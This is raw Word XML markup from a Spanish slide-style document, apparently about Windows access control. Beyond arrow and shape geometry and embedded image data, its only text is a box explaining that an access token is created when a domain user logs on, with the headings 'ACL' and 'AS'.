                                <a:moveTo>
                                  <a:pt x="2576830" y="1313688"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2573426" y="1262126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2571242" y="1228725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2543873" y="1244688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1817497" y="762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1806575" y="7112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2532900" y="1251077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2505456" y="1267079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2576830" y="1313688"/>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6178486" y="2334073"/>
                            <a:ext cx="294640" cy="226060"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="294640" h="226060">
                                <a:moveTo>
                                  <a:pt x="56388" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="197358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="197358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="225552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="294132" y="169163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="112775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="140970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56388" y="140970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56388" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="288" name="Graphic 288"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6178486" y="2334073"/>
                            <a:ext cx="294640" cy="226060"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="294640" h="226060">
                                <a:moveTo>
                                  <a:pt x="56388" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="56388" y="140970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="140970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="112775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="294132" y="169163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="225552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="237744" y="197358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="197358"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56388" y="0"/>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w:pict>
              <v:group w14:anchorId="332137EF" id="Group 282" o:spid="_x0000_s1026" style="position:absolute;margin-left:124.65pt;margin-top:-161.8pt;width:714.05pt;height:443.6pt;z-index:-17941504;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="90684,5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GG5SD0IxXxJ4k05tJ8QalZOMNb3MkePox&#10;FfblfNP7Q3hRtJ8VR6vEmLXUV+Zh0EqjBH4jB/Ouig7Ssc1eN43PJ6KKK7TgCiiigAooooAKKKKA&#10;CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK&#10;KKKANHw5pz6t4g02yQEtPcRx8dssOa+3AAoAHQcV80/s8+FG1bxW+rypm105SVJHBlYEAfgMn8q+&#10;l64q7vKx30I2jcKKKK5zp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&#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hvGXwN+HvxCkeTxH4L0TWJm5aa5sYzIT678bs/jXc0UAfN2t/8E8fgVrC4TwjJppJyWsd&#10;RuE/9Cciswf8E3Pgwq7RZ66F9Bq8uK+pKKrml3J5V2PmTSv+CcnwM0y4Msvhy91LP8F5qc7L/wCO&#10;stem+D/2ZfhT4CeJ9D8A6HZzR42zvaLNKMdPnk3MT75r06ihyb6jskIqqihVAVQMAAYApaKKk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">
                <v:shape id="Image 283" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:444;width:88680;height:5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">
                  <v:imagedata r:id="rId125" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 284" o:spid="_x0000_s1028" style="position:absolute;left:6204;top:15217;width:17818;height:38418;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1781810,38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" path="m608076,1459230r-10160,-7620l41224,2179536,16002,2160270,,2243963r76581,-37465l64592,2197354,51308,2187219,608076,1459230xem833628,2952750r-31750,l801878,1510284r-12700,l789178,2952750r-31750,l795528,3028975r31750,-63525l833628,2952750xem950976,567817r-31750,l919226,,906526,r,567817l874776,567817r38100,76200l944626,580517r6350,-12700xem1781556,3757714r-30557,8750l1104887,1508506r-12179,3556l1738807,3769944r-30530,8737l1765808,3841458r11150,-59297l1781556,3757714xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 285" o:spid="_x0000_s1029" style="position:absolute;left:47;top:30808;width:90589;height:25482;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9058910,25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" path="m,1001268r917447,l917447,710184,,710184r,291084xem804672,1790700r917447,l1722119,1499616r-917447,l804672,1790700xem1528572,2548128r1181099,l2709671,2343912r-1181099,l1528572,2548128xem3509771,1267968r2575561,l6085332,,3509771,r,1267968xem6441947,1499616r2616709,l9058656,3048r-2616709,l6441947,1499616xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 286" o:spid="_x0000_s1030" style="position:absolute;left:48510;top:17190;width:25769;height:13138;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="257683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" path="m1044067,7874l1034161,,42430,1250149,17526,1230376,,1313688r77216,-35941l64884,1267968r-12548,-9945l1044067,7874xem2576830,1313688r-3404,-51562l2571242,1228725r-27369,15963l1817497,762r-10922,6350l2532900,1251077r-27444,16002l2576830,1313688xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 287" o:spid="_x0000_s1031" style="position:absolute;left:61784;top:23340;width:2947;height:2261;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="29464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" path="m56388,l,,,197358r237744,l237744,225552r56388,-56389l237744,112775r,28195l56388,140970,56388,xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 288" o:spid="_x0000_s1032" style="position:absolute;left:61784;top:23340;width:2947;height:2261;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="29464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" path="m56388,r,140970l237744,140970r,-28195l294132,169163r-56388,56389l237744,197358,,197358,,,56388,xe" filled="f" strokecolor="#2e528f" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15789568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66F37EF0" wp14:editId="2659A4BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>573023</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-469112</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1932939" cy="64770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39" cy="647700"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0F054352" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="315" w:right="317"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>El token de seguridad (token de acceso) se crea cuando un usuario de dominio ha iniciado sesión</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="66F37EF0" id="Textbox 289" o:spid="_x0000_s1154" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:45.1pt;margin-top:-36.95pt;width:152.2pt;height:51pt;z-index:1578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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0F054352" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="315" w:right="317"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>El token de seguridad (token de acceso) se crea cuando un usuario de dominio ha iniciado sesión</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ACL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911128A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="436" w:lineRule="exact"/>
        <w:ind w:left="7659" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F010934" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45CAFE43" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1789192C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019775BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8CBBD0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740DE078" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536952FE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA1B205" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783711D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B3CBB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539AA290" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5B56FC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4124F83C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4253E4D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="256"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277F2483"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70</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A87A99" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId126"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="260" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01742497" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="6338"/>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77536" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5811C18C" wp14:editId="3C3AFE5D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1606337</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>1043110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7776209" cy="562737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6209" cy="5627370"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7776209" cy="5627370"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="292" name="Image 292"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId127" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="7639059" cy="5627310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="293" name="Graphic 293"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1653498" y="3256093"/>
                            <a:ext cx="3689350" cy="2157095"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3689350" h="2157095">
                                <a:moveTo>
                                  <a:pt x="0" y="1394396"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3542538" y="0"/>
                                </a:lnTo>
                              </a:path>
                              <a:path w="3689350" h="2157095">
                                <a:moveTo>
                                  <a:pt x="778763" y="2156790"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3688968" y="320040"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="sysDash"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="294" name="Graphic 294"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="597366" y="1549213"/>
                            <a:ext cx="1746885" cy="3855720"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="608076" y="1459230"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="597916" y="1451610"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41224" y="2179536"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16002" y="2160270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="2243963"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76581" y="2206498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="64592" y="2197354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="51308" y="2187219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="608076" y="1459230"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="833628" y="2952750"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="801878" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="801878" y="1510284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="789178" y="1510284"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="789178" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757428" y="2952750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="795528" y="3028975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="827278" y="2965450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="833628" y="2952750"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="950976" y="567817"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="919226" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="919226" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="906526" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="906526" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="874776" y="567817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="912876" y="644017"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="944626" y="580517"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="950976" y="567817"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1746885" h="3855720">
                                <a:moveTo>
                                  <a:pt x="1725320" y="2458110"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1725104" y="2457831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1724025" y="2456434"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1722755" y="2454783"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1677365" y="2441346"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1664855" y="2440381"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1663915" y="2440381"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1659089" y="2439670"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1658442" y="2439670"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1651482" y="2438095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1644510" y="2435974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1636649" y="2432685"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1637398" y="2432989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1636801" y="2432685"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1629283" y="2428621"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1626400" y="2426589"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1621790" y="2423414"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1588947" y="2387803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1561592" y="2340991"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1541653" y="2303145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1509268" y="2239772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1479880" y="2181085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1449451" y="2119249"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1436878" y="2093087"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1410716" y="2039112"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1356233" y="1924812"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1299210" y="1803908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1150239" y="1484757"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1138809" y="1490091"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1258443" y="1746885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1316482" y="1870456"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1344803" y="1930273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1399286" y="2044573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1425448" y="2098675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1438148" y="2124710"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450594" y="2150364"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1462913" y="2175129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1474724" y="2199386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1486535" y="2222881"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1509141" y="2267585"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1530350" y="2308987"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1550416" y="2346960"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1569339" y="2380996"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1596771" y="2417826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1631442" y="2444242"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1676273" y="2454021"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1689722" y="2454452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1688452" y="2454452"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1699006" y="2455545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1698498" y="2455545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1702739" y="2456611"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1706537" y="2458110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1707134" y="2458339"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1706664" y="2458110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1725320" y="2458110"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
